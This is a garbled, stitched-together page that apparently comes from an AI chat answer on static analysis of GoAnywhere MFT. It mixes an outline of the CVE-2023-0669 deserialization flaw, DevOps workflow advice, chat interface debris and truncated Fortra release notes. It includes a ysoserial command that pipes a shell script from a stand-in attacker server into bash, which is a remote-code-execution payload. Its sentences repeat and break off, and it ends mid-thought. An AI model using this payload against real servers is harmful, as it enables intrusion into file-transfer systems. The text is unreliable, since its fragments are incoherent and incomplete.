Based on the static analysis, an exploit chain was constructed using the library.
Because there is no academic paper titled "GoAnywhere Static Analysis," I have synthesized the available technical research, security advisories, and reverse engineering reports into a comprehensive technical whitepaper format below. This details how static analysis of the Java bytecode led to the discovery of the deserialization vulnerability.
The attacker generates a malicious serialized object that utilizes the Commons BeanUtils gadget chain to execute a system command (e.g., touch /tmp/pwned or a reverse shell).
Checking how servers, databases, and cloud storage connections are defined. goanywhere static analysis
Static analysis, in the context of software security, refers to the process of analyzing software without executing it, to identify potential vulnerabilities, weaknesses, or malicious code.
java -jar ysoserial.jar CommonsBeanutils1 "curl http://attacker-server/shell.sh | bash"
You're looking for research papers on "GoAnywhere static analysis". I'll provide you with some results: Based on the static analysis, an exploit chain
Always use the "Restrict" features in GoAnywhere to ensure that only expected file types and sizes are processed.
For organizations practicing , GoAnywhere configurations should be treated as code. By storing Project XMLs in a Git repository, you can trigger automated static analysis scans every time a workflow is updated. Tools like SonarQube or specialized XML linters can be configured to catch errors early. Best Practices for Secure GoAnywhere Workflows
Discovery of Pre-Authentication Remote Code Execution (CVE-2023-0669) Target: GoAnywhere MFT (Managed File Transfer) Component: Admin Web Console Vulnerability Class: Insecure Deserialization The attacker generates a malicious serialized object that
step-by-step guide on setting up a "dry run" workflow using variables? AI can make mistakes, so double-check responses Copy Creating a public link... You can now share this thread with others Good response Bad response 9 sites GoAnywhere MFT - Fortra Enhancements * Enhanced messaging between GoAnywhere MFT and Gateway to avoid memory leak in rare situations. * Enhanced the Proje... Fortra GoAnywhere MFT - Fortra Fixes * Enhanced the FTP/FTPS/SFTP Resource File Syntax implementation to cache and reuse the resource. * Fixed a decryption issue... Fortra GoAnywhere MFT - Fortra Updates. Updated Tomcat from version 9.0. 87 to 9.0. 97. Updated PeSIT Client and Server Libraries from 3.0. 1 to 3.1. 3. Upgrade ... Fortra GoAnywhere MFT - Fortra Fixes * Fixed an issue that occurred while uploading/downloading files having special characters in the name. * Fixed an issue wit... Fortra GoAnywhere MFT - Fortra Fixes * Fixed an issue preventing the sorting of some columns on the Schedules page. * Fixed an issue with the PI-13 value not pro... Fortra GoAnywhere MFT - Fortra Enhancements * Enhanced the performance of SMB (all versions) metadata lookup. * Enhanced Trigger execution to be more efficient a... Fortra GoAnywhere MFT - Fortra Listed below is a summary of features in GoAnywhere Agents: * Secures file transfers between Agents and the central GoAnywhere MFT... Fortra Fortra GoAnywhere MFT CVE-2025-10035: find impacted assets Sep 29, 2025 —
Your static analysis rules must catch these: